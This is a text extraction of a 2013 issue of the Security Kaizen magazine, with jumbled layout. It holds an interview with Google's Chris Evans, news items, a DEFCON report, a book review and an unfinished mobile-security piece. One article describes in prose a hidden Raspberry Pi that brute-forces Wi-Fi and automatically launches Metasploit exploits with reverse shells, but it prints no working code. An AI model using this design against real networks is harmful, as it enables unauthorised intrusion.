Vol3 Issue 11 .. Oct./Dec. 2013

www.bluekaizen.org

www.sklabs.org

You don't have to travel to Blackhat Las Vegas to attend the Samurai Web Hacking Course . Justin Searle will visit the Middle East this November to provide his famous course in Cairo & Dubai

Now!

Web Apps with SamuraiWTFWebAssessing and Exploiting

Dubai, UAENOVEMBER

25th - 28th

Cairo, EgyptNOVEMBER18th - 21st

06Securitykaizen MagazineContent 2

For Advertisement In Security Kaizen Magazine and www.bluekaizen.org WebsiteMail:info@bluekaizen.org Or Phone: +2 0100 267 5570

Security Kaizen is issued Every 3 months

Reproduction in Whole or part without written permission is strictly

prohibitedALL COPYRIGHTS ARE

PRESERVED TOWWW.BLUEKAIZEN.ORG

Chairman & Editor-in-ChiefMoataz Salah

EditorsAnwar Mohamed

Amr ThabetMohab Ali

Adham MohamedAmgad Magdy Ahmed Riad Alex Rice

Website DevelopmentMariam Samy

Marketing CoordinatorMahitab AhmedMohamed Saeed

ProofreadingJeff Compton

Designed & PrintedMedhat A.Elbaky

01013126152

contentsNew & News

Grey Hat

Utilization of hardware in hacking nowadays is eminent in various fields. It adds a new power of mobility and exposure to unknown implementations of various attacks.

New & NewsUser To User

It’s very basic for a security pentester or security engineer to have a solid understanding of computer networking fundamentals

Book Review

is written by Mario Heiderich, Eduardo Alberto, Gareth Heyes and David Lindsay

Best Practice

More than ever, people are using their mobile device as their primary means of accessing the Internet.

In this article I will provide an Overview of A new Information Security Management System Standard ISO/IEC 27001:2013 , The new standard just Published from a few Days Earlier .

contentsEditor’s Note

As we are slowly leaving 2013, a long year as it seems, we will be releasing our last version of security kaizen magazine as we know it.

Interview

I also keep an eye on Google’s Vulner-ability Reward Programs. I find it very rewarding to be able to engage and reward the wider security community.

It was my first time at the most famous hacker’s conference, (DEFCON). Hacker’s from all over the world, sharing information and new hacking techniques.

Securitykaizen MagazineEditor’s Note3

Best of luck for Adham, I’m sure he will do great work. P.S: This issue was prepared in cooperation between Adham and me.

Good news is that Security Kaizen magazine will be released more often: Instead of issuing it quarterly, we will have an issue every couple of months. We will also focus on providing our Gold Members with more benefits. We are making partnership with different entities to be able to provide them with a unique service.

Our gold members will also get more privileges in 2014:In addition to 2013 exclusive benefits; renting books from BK library, receiving SK magazine to your address, discounts for training centers and Bluekaizen events. In 2014, members will have a chance for a free yearly subscription in magazine, which is originally worth 220 USD.

To know more about the membership program, please contact us on info@bluekaizen.org

Last but not least, Cairo Security Camp registration is now open. Please, take some time to check our new website www.cairosecuritycamp.com. I am excited to meet all our beloved members and readers this November in CSCAMP2013.

ISSUELAST

Editor’sNote

As we are slowly leaving 2013, a long year as it seems, we will be releasing our last version of security kaizen magazine as we know it.

Welcoming a new year is a chance to open up to new possibilities and opportunities. It is an opening for a fresh start, new ideas, and new goals.

For that as a new year resolution: I’ve decided to infuse new blood into our magazine, one with a more outgoing view and can help boost creativity and change the overall view of the magazine. Starting from 2014 Adham Mohamed will be part of our team as the new editor of Security Kaizen magazine.

www.bluekaizen.org

The First Online Recruitment Portal for Information Security Jobs in MiddleEast

Grey Hat5 Securitykaizen MagazineGrey Hat

Utilization of hardware in hacking nowadays is eminent in various fields. It adds a new power of mobility and exposure to unknown implementations of various attacks. For a long time, hardware hacking was restricted to engineers understanding the hardware they are working on, so they can modify it to expand its usage in an abnormal way. Nowadays there are many kits sold off the shelf that enable programmers with limited knowledge of hardware to make their own projects by adding parts to the kit and composing their system and programming it using python, c# or any high level language, without direct knowledge of the underlying hardware.

Testing KitA Portable Penetration

www.bluekaizen.org

Security Researcher

Adham Mohamed

Grey Hat6Securitykaizen MagazineGrey Hat

In order to be a good hardware hacker you should have enough knowledge in the field of electronics and of course circuits, usually electronics engineers have these abilities, but it`s a skill that gets matured with experience. Though you can make a hardware keylogger in raspberry pi which will have dimensions about 85.60 mm × 53.98 mm, a skillful hardware engineer can make it in a dimension of 4 cm * 1 cm, if he uses a PCB (Printer Circuit Board), a microcontroller and others. Of course the size can be reduced greatly to an average of 1 cm* 1 cm if surface mounted components (small sized components that are hard soldered at home, usually done at a factory) are used.

When you talk to people about hardware hacking you`ll hear some keywords based on their perspective, like the hardware keylogger (a dongle that`s attached to the ps2/usb keyboard cable to store keystrokes), hacking Playstation, Overclocking, Bitcoining machines, emulated hardware dongles (for software that requires a dongle as a serial verification), signal jammers and many more.

In this topic we`ll be discussing one of the projects I made using raspberry pi as a mobile (moveable) penetration testing device. This introduces the idea of down scaling projects to fit into a spying-behavior type and non-engineers will find it easy while expanding their vision of programming.Raspberry pi [1] is a single board computer with a size nearly matching a wallet. You can check it`s full specs from various online sources and it`s shipped to nearly everywhere. The info you need to know is that it runs on a 700 Mhz ARM processor that can be overclocked to reach 1 GHz, it has 2 models, model B rev 2 features 512 MByte of memory and can run Linux/

www.bluekaizen.org

Rasberry PiA credit-card-sized computer

board that has plenty of features for 35$ and runs Unix/

Linux

7Grey HatSecuritykaizen MagazineGrey Hat

and receiver but you`ll have to get an arduino kit to interface with the android mobile, which is a hassle, so let’s keep it simple.For a use case scenario, let`s imagine you have the device in your backpack and you’re walking in the street or in a target entity, it detects an open access point, then it tries to get associated, or tries to bruteforce the access point credentials using a dictionary list. Once it gets associated it scans for hosts using a simple Nmap scan to discover online hosts and their OS and then sends the data to your mobile where an application is installed and paired with Bluetooth attached to the device.When you open the mobile application you`ll find the list of the online ip’s and their OS. Through the application you can command raspberry pi to find more info, try to autopwn the target or do a custom scan.There are not many issues in trying to get associated to a network or do a simple Nmap scan and parse the result and send it over Bluetooth, but it`s a bit challenging when you`re trying to autopwn.I`m using Metasploit framework v4 and the old autopwn (db_autopwn.rb) which is not available now as it was found to follow bad methodology of profiling exploits ready to be launched. I used the Metasploit API which integrates with python`s msfrpc module in order to list the exploit information and apply the necessary filters, launch the exploits at the target, then listen for any connections and report them. Now as you see it`s more about programming and less about hardware, which enables many skillful hackers to abuse the exposure of the mobility to a terrifying extent. Though don`t forget that the speed will definitely vary as you’re using far less resources than that available by a pc or a laptop.Now for the network SSID sniffing, there`s a simple 10 line code at Securitytube[2]That scans for SSIDs

Unix OSes capable of working on ARM arch from an attached SDCard. Special penetration testing distro’s were made available to this platform like pwnpi, kali and raspberry pwn. It can run Rasbian, Fedora, Arch Linux, NetBSD and others.It`s worth mentioning that the kit has 2 usb slots, RJ45 socket, HDMI, miniusb for power input, analog audio output and an RCA for connection with old Tv’s. It also includes GPIO pins to interface with external hardware, all of that for $35. Let the hacking begin!The idea of the project came to me from the concept of Wardriving (identifying the state of Wifi access points across a region and pinpointing them on a map). Wardriving has special hardware requirements but can be done using a laptop with a good wireless NIC. You can implement it on raspberry pi by attaching an external Wifi dongle with a high gain antenna and a good power supply. Put it in your bag and just keep walking and map the entire area, which I plan on doing soon.So instead of just logging the state of public Wifi`s, why not make a platform that`s capable of performing automatic penetration testing on connected devices and producing a report.Of course you shouldn`t violate privacy laws and go rogue on people`s networks without permission, this is a POC, you can face serious charges if you attempt to try this on the public in general.This project was created so that you can perform automated penetration tests, either by connecting to DSL cable or simply by wireless means using the attached wireless NIC on raspberry pi.Some control was needed over the device. To keep it totally hidden and away from any suspicion you can use your mobile phone to control raspberry pi using Bluetooth, you`ll have to add a Bluetooth dongle to the kit.You have plenty of other options for connectivity asyou can attach an LCD and buttons or RF transmitter

www.bluekaizen.org

With a slight modification you can try associating to each and trying the passwords. At this point you have made an advanced passive Wardriving scanner.After you get associated you`ll run a simple Nmap scan and parse the results to get the online pc’s with their OS info. After getting a request from the mobile phone to start autopwning the target, an exploit search starts depending on the scan results of Nmap and compared with the exploit database created from Metasploit earlier. Python will use the msfrpc[3] to communicate with Metasploit.Here is a sample code screenshot of the msf api connection

In case you`re asking about the exploit database, I used python with MSF api to list all available exploits and their non-optional parameters in a MySQL database. This phase is launched after an update is ran against Metasploit to update exploit information. Here is a snapshot that copies all the Metasploit exploit information into a python array of exploit structures.

The exploits are launched with a payload of reverse shell connection and the final results are saved to an html file indicating vulnerable hosts and a simple log is sent to the mobile.I don`t have enough space to talk about the mobile part but maybe I’ll fuse it in future topics.It`s useful to note that this entire project can be totally automated and needs no human intervention as it will simply try to exploit any reachable device and log information.Hardware usage in hacking is limitless and the applications are endless. We`ll try to keep you updated with more projects in coming issues.

References[1] Raspberry pi official site - http://www.raspberrypi.org/[2] http://hackoftheday.securitytube.net/2013/03/wi-fi-sniffer-in-10-lines-of-python.html[3] http://blog.spiderlabs.com/2012/01/scripting-metasploit-using-msgrpc-.html

8Grey HatSecuritykaizen MagazineGrey Hat

www.bluekaizen.org

It’s very basic for a security pentester or security engineer to have a solid understanding of computer networking fundamentals, so as I was new to these fundamentals I thought it would be a great experience to contribute to the “SRDF Project” where my experience started. Today I am going to tell you about my story with pushing my first Packet Structure Class & developing my packet analysis library “Packetyzer”.

The story began when I met a friend “Eng. Amr Thabet” during a session at my college, where he started to tell me about his project & that he was looking for contributors. Moreover I was really motivated to contribute and it would help me gain programming

and networking experience, as my C++ language skills were not powerful enough.

Let me tell you about my project. Packetyzer is a high level library for C++ designed to make the forging and decoding of network packets easier. It has the ability to decode packets of the most common network protocols, capture them and send them on the wire. This capability allows the construction of tools that can probe, scan or attack networks. It enables the creation of networking tools in a few lines.

A packet is described by its protocol layer type, where fields of each layer have useful default values that you can overload. All packets and connection streams are analyzed, from the Ethernet header to the application layer protocols.

Raw packets are represented as an array of cPacket class where each packet is analyzed carefully. cPacket is the main packet representation used in Packetyzer.

User To UserSecuritykaizen MagazineUser to User9

C++ packet analysis librarywith Packetyzer development My Story

www.bluekaizen.org

Over the last month I have been optimizing the memory usage for the library, after inspecting the memory usage and analyzing a pcap file of 10000 packets whose file size is 93.0 Mb. I have found that after freeing memory there was garbage left behind of about 500Kb which is very low when compared to other libraries, even Wireshark.

At the end of the day, all I can say is that this was a great experience for me, which allowed me to have an open mind on other aspects of computer networking and computer security. I am planning to have many more features in Packetyzer

Enhancing TCP Reassembler to be more intelligent.• Implementing IPv6, IPv6 Options Decoders.• Adding Layered Service Provider class.• Adding more application layer parsers.

After my first push I was motivated to continue and enhance this class. Amr guided me, so I started to widen the functionality of the class. Following the OOP theory I have created other classes like cPcapFile where packets are feed to the packet stack through it “using a pcap file” or even by cPacketGen “generating raw packets” or cWinpcapCapture “capturing network packets”, where the stack is analyzed and represented as a traffic structure “by cTraffic class”.Moreover cTraffic was the start as its responsible to analyze packets of the same session and add the related packets by their protocol types as Streams which are composed of IP protocols “cConStream” and non-IP protocols “cARPStream & ICMPStream”. cConstream analyzes TCP and UDP protocols, then the application layer protocols are decoded into their related Streams “like cHTTPStream”.

The following shows a basic usage of my library:Packetyzer calculates packet checksum and checks the TTL to detect if the packet is forged. It has the ability to recalculate the checksum and correct it in the actual packet.

I have enhanced cTCPReassembler to reassemble TCP Segments and get the data buffer from the packets reassembly.

User To UserSecuritykaizen MagazineUser to User 10

www.bluekaizen.org

Security Researcher

Anwar Mohamed

11 Securitykaizen MagazineInterviewInterviewInterviwe with

Chris Evans Google where I founded and built the Google Chrome Security Team

www.bluekaizen.org

12InterviewSecuritykaizen MagazineInterview

Can you please introduce yourself to security kaizen readers?

Hi, I’m Chris. I work at Google where I founded and built the Google Chrome Security Team. Previously, I’ve worked on sandboxing technologies, security research, and open source software such as vsftpd.

Can you please give us more details about the nature of your job in Google?

I still spend much of my time on Google Chrome, because I like the product and enjoy the responsibility of looking after our users. I like working out what projects we should undertake to best secure our users, or investigating novel defensive techniques.

What is the future of Google Native Client( NaCI ) plugin in Chrome Project ?

I’m personally excited by Native Client because it can be used to increase security. The history of the security industry is plagued by problems with native code, including browser plug-ins. Native Client runs code at pretty much native speed, but inside a couple of layers of sandboxing. There’s already a rich ecosystem of Chrome (and Chrome OS) applications that have Native Client components, such as a high-performance SSH client [link: https://chrome.google.com/webstore/detail/secure-shell/pnhechapfaindjhompbnflcldabbghjo] or the Google Plus photos application [link: https://chrome.google.com/webstore/detail/google%2B-photos/efjnaogkjbogokcnohkmnjdojkikgobo]

Privacy is always an issue when we talk about Google products. Google knows my place, my phone number, my friends,..etc. . How do you deal with your customers’ concern about their privacy especially after the prism case?

Probably the most important thing you can do to protect your privacy is to use secure client software and secure web services. My personal choice for my e-mail is Gmail, accessed via Google Chrome.

State-sponsored attackers frequently go after weaknesses in client software. Your data, wherever you put it, is only as safe as the computer you use to access it.

We’ve responded to this concern by putting significant effort into securing Google Chrome. It automatically updates itself with security fixes and integrates with Google’s Safe Browsing facilities. It deploys strong

sandboxing technology and we were very excited to extend our strong sandbox to the Flash plug-in last year [link: http://blog.chromium.org/2012/08/the-road-to-safer-more-stable-and.html].

We also have some pioneering technology in Chrome that validates SSL certificates more carefully. This protection played a big role in the 2011 incident (with regional connections) involving the former

Dutch certificate authority, DigiNotar [link: http://en.wikipedia.org/wiki/DigiNotar]. It was Chrome that detected the DigiNotar compromise and Chrome users were automatically protected from the fraudulent certificate when connecting to Gmail.

We’re always pushing ourselves to add more defenses and protections.

Chris Evans .. I also keep an eye on Google’s Vulnerability Reward Programs. I find it very rewarding to be able to engage and reward the wider security community. A well-run program is a good way of moving your security ahead of the pack.

www.bluekaizen.org

Securitykaizen MagazineInterview13InterviewWhat are the different bounty programs that Google

provide for security researchers?

We have two well-established bounty programs -- Google Web [link: http://www.google.com/about/appsecurity/reward-program/] and Chromium [link: http://www.chromium.org/Home/chromium-security/vulnerability-rewards-program] -- and one occasional competition, Pwnium. We also sponsor the well known Pwn2Own competition.

Overall, we recently announced that we’ve paid out over $2 million USD to researchers. You can read more here [link: http://googleonlinesecurity.blogspot.com/2013/08/security-rewards-at-google-two.html].

What was the most critical vulnerability discovered in chrome? And what was the highest reward provided by Google?

We’ve received some excellent submissions as part of our Pwnium competition [link: http://blog.chromium.org/2012/02/pwnium-rewards-for-exploits.html]. We’ve paid out $60,000 USD a few times.

Thanks to our reward programs, any serious bugs tend to get safely reported to us, instead of becoming critical and turning up “in the wild”.

What does it take for a person to find bugs in chrome?

Finding security bugs in a browser can be tricky. One strategy that can be effective is to start “fuzzing”, which is the art of throwing malformed input at a product to see if it gets confused. Since we’re open source, other researchers like to read and study modules of Chrome until they understand an area well enough to spot possible bugs. Another tack is to try and get ideas from past security bugs in Chrome, which we publicly document in our open bug tracker.

External submissions of Chrome security bugs are dropping off as it gets harder and harder to find serious issues, but we have recently raised our reward levels to compensate!

After exploiting chrome in competitions like pwn2own. What is your response? You get mad because your product got hacked or you get happy because vulnerability was discovered?

We are delighted. There’s no point in running or participating in these competitions unless you get results that you can learn from. In fact, we go out of our way to help researchers compete, engage in sponsorships, and set payout levels such that we’re almost guaranteed to get entries. We get to learn a lot from every valid entry, and often devise general hardening measures to make Chrome more solid overall.

I’d also note that no-one gets “hacked” at these competitions. That’s the whole point -- they are a safe outlet for advanced security research. Having and supporting Pwnium and Pwn2Own is an important reason why we’re not seeing critical Chrome threats in the wild.

What does it need to get hired at chrome security team?

Most of our hires are strong engineers who are passionate about security. The engineering background is important as we have a culture of fixing things and implementing defenses, as well as simply finding issues. Being a strong engineer means you can dive into the code and make it better.

What are your advices, best practices, to our readers to have a secure browsing on Google chrome?

I recommend browsing the web with Google Chrome. Disable (or better uninstall) unnecessary plug-ins (see chrome://plugins). Chrome helps you keep your plug-ins up to date and has warns you before running certain more dangerous plug-ins, but it’s still safer to disable unwanted ones. Make sure your underlying operating system is fully patched. Try and avoid downloading and opening anything outside the browser.

If all of this sounds a little bothersome, some Chrome OS laptop models are very inexpensive, and take care of a lot of these security measures automatically.

www.bluekaizen.org

Securitykaizen MagazineInterview 16Interview

provided by Rawy.me

provided by Rawy.meGeeks Comics

New & NewasSecuritykaizen MagazineNew & News15

News

Roman Unuchek, a Kaspersky researcher who blogged about the threat , said that users have been targeted with spam text messages containing malicious links that install another Android Trojan called Opfake. Once the user installs Opfake, the malware command-and-control server instructs the Trojan to spam out messages to victims' contacts, which directs them to the Trojan Obad.

By Amgad Magdy

The China Internet Network Information Center, which made an announcement about the attacks on Sunday 28 august morning, the DDoS strikes were the most severe between 2 a.m. and 4 a.m. local time on Sunday, “leading to slow or interrupted [internet] access” for users throughout the country.

1

2

Android Trojan spreads through mobile

China attacked by biggest-ever DDoS attacks

www.bluekaizen.org

New & NewasSecuritykaizen MagazineNew & News 16

The company offers two programs, one for Google-owned services, such as its flagship Google.com site, and another for the Chromium Project, the open source web browser that operates Google Chrome. When combined, more than 2,000 bugs were reported on and fixed. The Google bug bounty program started from three years ago.

An Armenian branch of hacker collective Anonymous has leaked 7 GB worth of documents relating to Azerenergy, the leading energy producer in the Eurasian country of Azerbaijan. “We are not that very much happy with Aliev's politics therefore this release is just another leap in a series of releases to fight Azerbaijani mafia clans,” the group said but an Azerbaijan hasn’t any comment till now.

Google bug bounty program hitsmore than million dollar

Anonymous attacked leading Azerbaijan Energy Company

4

5

The company said that attackers successfully logged in to its site nearly 24,000 times between June 9 and Thursday, after making more than 15 million attempts to fraudulently access it. And Company apologized for costumers.

Club Nintendo website hacked3

www.bluekaizen.org

New & NewasSecuritykaizen MagazineNew & News17

Now Facebook has announced that it is delaying implementation of the new policy, although in an emailed comment to the LA Times, it denied that it would be changing anything. "We are taking the time to ensure that user comments are reviewed and taken into consideration to determine whether further updates are necessary, And we expect to finalize the process in the coming week." facebook said.

According to Apple's research, 50% of Smartphone users don’t set passcodes on their iPhones, leaving personal information unprotected. However, TouchID makes it quick and easy to unlock your phone

without one. This technology using fingerprint scanner. And also add iCloud Keychain eliminates the need for third party password security clients by creating truly randomized passwords for all your various accounts. Each password is unique, meaning no two accounts will feature the same, adding an extra layer of security even if one site gets hacked. It then stores passwords, account names and credit card information so you can automatically enter it at any time you need to make an online purchase or sign in and find my iphone app to control your iphone remotely if miss it.

Facebook Delays its New Privacy Policy

New Apple Security Upgrades to Protect info

6

8

The messages claim that the recipient's "BlackBerry ID" has been created, and to retrieve it, they need to click on an attachment included in the email, according to Web sense Security Labs, which detected the threat. But doing so results in the installation of malware. The same problem exists for iPhone but no comment from RIM and apple security team .

BlackBerry, iPhone users attacked with Phishing emails

7

www.bluekaizen.org

New & NewasIt was my first time at the most famous hacker’s conference, (DEFCON). Hacker’s from all over the world, sharing information and new hacking techniques. This year was special after the PRISM Ops by the US government and Snowden leaks.

Hacker’s Conference

Securitykaizen MagazineNew & News 18

www.bluekaizen.org

User To UserSecuritykaizen MagazineNew & News19

The story began by applying to the conference CFP (Call for Papers) to talk about a new tool I created (still not finished) named “Exploitation Detection System (EDS)”. I would talk about all the ideas inside it and a new concept to firewalls, IDS and IPS named EDS/EPS (Exploitation Detection and Prevention system).This new type of tool, focuses not on the network level but the memory level. It’s designed to detect suspicious memory patterns and memory corruptions inside the memory. It’s not an antivirus program, it’s signatureless and it doesn’t detect malware but it detects exploitation and memory corruptions. It’s designed mainly to detect APT attacks after the failure of known security tools to detect them.

Even though my tool was not finished, I decided to apply to get some feedback.

At the beginning, the conference accepted many talks which they released on their website without replying to me with a yes or no. Later they said there were still a few talks left to be decided upon and the chance to be accepted was approximately 20%. After receiving this message I thought they would refuse my presentation and I lost hope, but I was surprised by their next e-mail saying that I was accepted and now officially a SPEAKER at DEFCON. I didn’t believe it at the beginning but it was true, I’m a speaker in one of the biggest security conferences in the world, DEFCON.The first thing you notice at DEFCON is the number of participants in the event. This year there was up to 14,000 security researchers, many of them enjoying their first time.

This year DEFCON included many villages. One of them was Lockpicking, it included the tools, sessions and labs necessary for learning lockpicking and testing your skills. The second village was for contests, it included challenges in reversing and exploitations … etc. I didn’t participate but it was on reverse engineering ARM processors, which aren’t famous in reversing.

The third village was CTF (capture the flag), which focused on attack and defense challenges where every team has flags and services running. The goal was to attack the other team’s services and capture their flags, which was interesting.

There was also the Tamper Evident Village. There were demonstrations of high-security tamper-evident seals and how to open them without leaving evidence as well as how to sneakily open everything from envelopes to mechanical seals, contests, and take-home kits for practice.

There was also a Wireless Village which was created to demonstrate wireless hacking … including talks, labs and their websites included in the references.Other villages such as the Hardware Hacking Village and the Social Engineering Village were also present. I didn’t take part in the Social Engineering Village because I’m sure my HumanOS would be very vulnerable to these guys … but it seemed to have many interesting topics and labs.

Also in DEFCON you’ll notice the famous Wall of Sheep, which is a demonstration of what happens when people log into email, websites, and other services without using encryption. The Wall is meant as a public cautionary tale - and hackers are razzed forever if their name appears on the Wall during the conference.

You will also notice at DEFCON, the vendor room … or you can say the DEFCON market. It includes Hackers for charity, tools and many vendors selling t-shirts, CDs, lockpicking tools, hacking tools and hacking books. The room was full of products from different vendors and competitive products especially on lockpicking tools

The first day of the conference was dedicated to beginners and newcomers. It existed of a welcoming panel for all newcomers and the DEFCON Documentary. This year the presentations also included the on-screen words of what the speaker was saying, so if you miss a word or something, you could see it in the script.

The sessions during the first day were talking about the fundamentals, like the Pentester’s Toolkit, which is what you will have in your bag when you go to a company to perform a Pentest. It was a simple presentation of what you will need to do a proper Pentest.

www.bluekaizen.org

User To UserSecuritykaizen MagazineNew & News 20

about a post exploitation tool named smbexec. It takes advantage of native Windows functionality and SMB authentication to execute commands on remote Windows systems without having to upload a payload. It was a very good tool and it gathers a lot of information from the infected machine.

Another post exploitation tool presented this year was “PowerPreter” which was created using the PowerShell scripting language in windows. It’s very powerful and modular and easy to add commands and plugins. After some failed attempts, the presenter tested his tool on his “real” machine which revealed all of his passwords to audience which was crazy.

This year also saw a couple of presentations on IPv6 which caught the interest of many researchers this year. One of them created a tool for hacking enabled-by-default IPv6 machines called “Fear the Evil FOCA”. In his tool, he uses announce protocols similar to ARP to spoof the IPv6 machines and redirect them to another gateway, another DNS and reset their proxy settings, which takes control of the internet communication on the victim machine and steals its credentials. He worked with HTTPS in various ways to do MITM Attacks on it like stripping “s” and other ways of hacking. It was a very interesting topic.

The 2nd session was Oil and Gas infosec 101 … which was talking about security for oil and gas companies. He didn’t go in depth in the technology part but he talked about the problem in general concerning the oil and gas lines and the old technologies used on the stations and so on. He also talked from the managerial level on how to secure it or at least defend what you can defend.

The 3rd session was talking about Pentoo. A hacking distribution like backtrack. It’s based on Gentoo which is a secure Linux distro and described the new technologies behind the new release.

The last talk on day one was about Wireless hacking. It focused on the fundamentals and basic knowledge around wireless technologies and its hacking techniques, which introduced the wireless village to people.

The remaining days were the advanced level, the sessions become 4 tracks and you have to choose between sessions. I will highlight some of the interesting sessions this year.

One of the interesting sessions this year for me was “Getting The Goods With smbexec” which talked

www.bluekaizen.org

User To UserSecuritykaizen MagazineNew & News21

Another Interesting topic this year was “Android”. Talks included IDS for Android and another which bypassed SEAndroid using some techniques (or abusing some bugs) while rebooting the machine.

From the Panel talk’s side, the focus this year was on Snowden Leaks and PRISM Ops, with the absence of NSA guys and any governmental guy involved in this operation. I attended “An Open Letter - The White Hat's Dilemma”, which talked about the Ethics of hacking and security and the move of many companies on collecting “everything” and creating algorithms to do Big data Analytics to get information on the whole attack. He talked mainly from the ethics side and asked the audience what they would do “honestly” if they’re facing a situation in the gray area, between ethics and security and your career.

There were also presenters talking about Malware they created like “A Thorny Piece Of Malware (And Me)” and another one “How my Botnet Purchased Millions of Dollars in Cars”.

There were also many presentations about Exploitation. From the Attack Side, there was couple of presentations, one of them talked about hacking cars and release code, tools and exploits to remotely control and hack vehicles like the Toyota Prius in “Adventures in Automotive Networks and Control Units”. It was a very famous topic this year but unfortunately I didn’t attend it, but I can’t wait for the video release.

Another one talked about exploiting hackers’ offensive tools in “Pwn'ing You(r) Cyber Offenders” from returning fake results while doing port scanning or OS fingerprinting to hacking your tools, sending you an XXS script (for web-based tools) or exploiting shellcode (for binary-based tools).

On the defense side, there were two presentations talking about detecting exploited processes and memory corruption. One of them was “EMET 4.0 PKI Mitigation”, which is a tool created by Microsoft to detect exploited processes and memory corruptions, but in their talk they focused on detecting invalid SSL certificates.

And my presentation this year was in the same category. In this presentation “EDS: Exploitation Detection System” I talked about a new concept and my new tool. As I said it focuses in depth on processes’ memory to detect memory injections, shellcode, exploitation techniques or any attack vector. It focuses on monitoring the abnormal behavior allowing you to correlate it with the suspicious memory patterns found in the process. It’s similar to EMET but it’s more mature and uses a wider approach.

Not all DEFCON presentations this year were serious. There were presentations for comedy and partying. The first presentation during the first day was created to welcome newbies to DEFCON and it was full of beer, wine and jokes.

The style of the DEFCON conference is similar to western parties in addition to the hackers style, but the whole experience was great and it’s an experience I will never forget.

References:1. http://defcon-wireless-village.com/2.http://www.wallofsheep.com/blogs/news/tagged/defcon3. http://www.defcon.org/4. http://www.social-engineer.org/

www.bluekaizen.org

Freelancer Malware Researcher and the author of Pokas x86 Emulator and Security Research and Development Framework

Amr Thabet

User To User

www.bluekaizen.org

Securitykaizen MagazineBook Review 22Book ReviewWeb application obfuscation

is written by Mario Heiderich, Eduardo Alberto, Gareth Heyes and David Lindsay

Web application security researcher at Syn-apse labs.

Mohab Ali

Book Review23 Securitykaizen MagazineBook Review

Dr. Mario Heiderich is the founder of cure53, a penetration testing company. He speaks at many conferences is the author of two books and excels at client side attacks and defense.Eduardo Alberto Vela Nava is an information security researcher at Google. He previously worked at Alibaba Cloud computing and Hi5. He specializes in Web Application, Browsers and Browser plug-in security.Gareth Heyes is an independent security researcher and occasionally delves into Web Development. He is the author of many web related tools and sandboxes.David Lindsay is a senior security consultant with Cigital inc. He researches Web Application vulnerabilities and does pentests, code audits and code analysis.

The `introduction` chapter recites the various modern usages of the internet and its security aspects such as general security, protection measures and attacks, and the definition of filtering and it's usage in the Web Application security world. It explains the basic usage of regular expressions in filtering.

The authors recommend it for Penetration Testers, Security Researchers, Incident Responders and QA testers. I agree all of those will benefit from it, but I simply recommend it for anyone who is interested in Web Application attacks or defense.

Chapter 2`HTML`, they shed light on the creation of HTML and its history. It explains the basic tags and structure of HTML markup, various function tags and comments, and it mentions the difference in browser engines and how the behavior of rendering differs between different browsers.

This chapter also explains why obfuscation matters and the purpose of using it. It doesn't just show you the obfuscated code but teaches you a trick to discover it yourself too. It also shows you multiple ways to execute JavaScript and not just by using the SCRIPT tag. It dives into more advanced markup obfuscation, comments and broken protocol handlers, and then finishes with an overview of HTML5, XML and SVG.

Chapter 3`JavaScript and VBScript` is great! It explains JavaScript’s syntax and encoding, and then shows wicked ways of naming variables and value assigning voodoo. It explains another scripting language that's been supported by Internet Explorer since the early days and that language is VBscript. It will teach you Comments/Events/Functions and encoding of VBscript. It explains another language (which I never heard of before) called E4X and it’s apparently only supported by Firefox and is basically JavaScript mixed with XML support.I overheard some people discussing protection against XSS and someone suggested the banning of the SCRIPT tag (which as you may know is a bad idea) and then someone mentioned banning "alert" and other JavaScript functions/prototypes used in such attacks. Chapter 1 destroyed the first suggestion of banning "SCRIPT" because there are a dozen other tags that could be used and the 4th chapter, as you’ll see, destroyed the other suggestion.

Chapter 4`Nonalphanumeric JavaScript` is by far my personal favorite. In this chapter you will learn to execute JavaScript without the use of alphanumerics (A-Z, 0-9) and I find that very impressive!

The chapter explains the different arithmetic’s and operators that will be used to generate the executable JavaScript code.

www.bluekaizen.org

Book ReviewSecuritykaizen MagazineBook Review 24

www.bluekaizen.org

Chapter 5`CSS`, explains the basic Cascading Style Sheets (CSS) syntax and some encoding and obfuscation. It then shows different CSS attack vectors such as clickjacking (UI redressing attack), CSS style decompilation, CSS attribute reader, history attack, LAN attacks and others.

Chapter 6`PHP` begins with and an overview of PHP and its history. It then shows different methods of obfuscating code in PHP. It explains PHP datatypes including numerical strings and delimiting strings. Then it explains mixing datatypes with comments to make obfuscation even harder to reverse, and ends with how to evaluate and execute PHP code.

Chapter 7`SQL` introduces you to Structured Query Language (SQL) the most common language directly interacting with databases. It makes you familiar with different DBMS (MySQL/Postgres/Oracle/SQL 2008). It also shows the use functions in various DBMS in terms of obfuscation and the functions capability of encoding the executed query. It explains the use of operators, comments, SQL and XML, intermediary characters, regular notation and delimiting. It also explains the use of Unicode and escaping in SQL. It shows various tricks of using browser databases (HTML5 feature) in executing JavaScript code, and also shows ways of obfuscating those queries.

Chapter 8`Web application firewalls and client-side filters`, it first mentions the development of the idea and the need for WAF (Web application firewall) and different filtering, and why it's sometimes impossible to apply security practices in the code itself , hence there is a need for WAF. It shows attack vectors that bypass blacklisting WAF’s and explains the idea of client-side filters and how to bypass those filters. It also focuses on IE8 filter bypassing.

Chapter 9`Mitigating bypass and attacks`, it's meant for security researchers interested in defenses against attacks explained in the earlier chapters. It explains suggested protection against: code injections, HTML injection, XSS and Server side code execution. It then talks about protecting the DOM and how to use sandboxing, detecting arrays, code replacement, handling options, layers and proxying.

The final chapteris `Future development`, which discusses the security problems and challenges that might face web applications in the future. While it speaks about the future, it discusses the impact on current applications. It talks basically about data theft through improvised methods and also talks about the security aspects of HTML5 and CSS3. It mentions the security risk of using new header fields and values and browser plug-in security.

This book is a must-read for all security professionals; I recommend it, especially for those who are focused on web application security. It doesn't matter if you are into the attack or defense mechanism, this book will satisfy both needs. All authors put a great deal of effort into making this out-of-the-box masterpiece. This book covers a lot of areas and is an awesome start for beginners and intermediates to make the leap into mastering obfuscation, evasion and filtering.

For everyone who couldn’t make the forum yesterday, we have documented some of the best practices for developing on Android and iOS, and we're excited to share them with other developers.

From the outset, it is important to note that making apps that are secure on Android and iOS is hard. When your application behaves in manner that is unintended, it creates security and privacy implications for the end user, and this might not be restricted to the confines of your app, but potentially across the device.

More than ever, people are using their mobile device as their primary means of accessing the Internet. This provides not only unparalleled access to information, but also millions upon millions of applications built by third party developers. This platform approach enables users to experience great apps built by developers both large and small. However, this decentralized platform approach only works if there are strong, industry-wide best practices around important app basics such as security.

Top risks include malware installed on the phone alongside your app, tools that allow malicious actors to snoop on device activity, and even malicious websites that can trigger actions in your app using custom URL schemes.

The only way to ensure that your application is secure is to engineer your application for security from the ground up.Here are some recommendations to reduce vulnerabilities in your application:

from facebook security team on how to develop mobile app securelyTop 12 advices

Securitykaizen MagazineBest Practice25

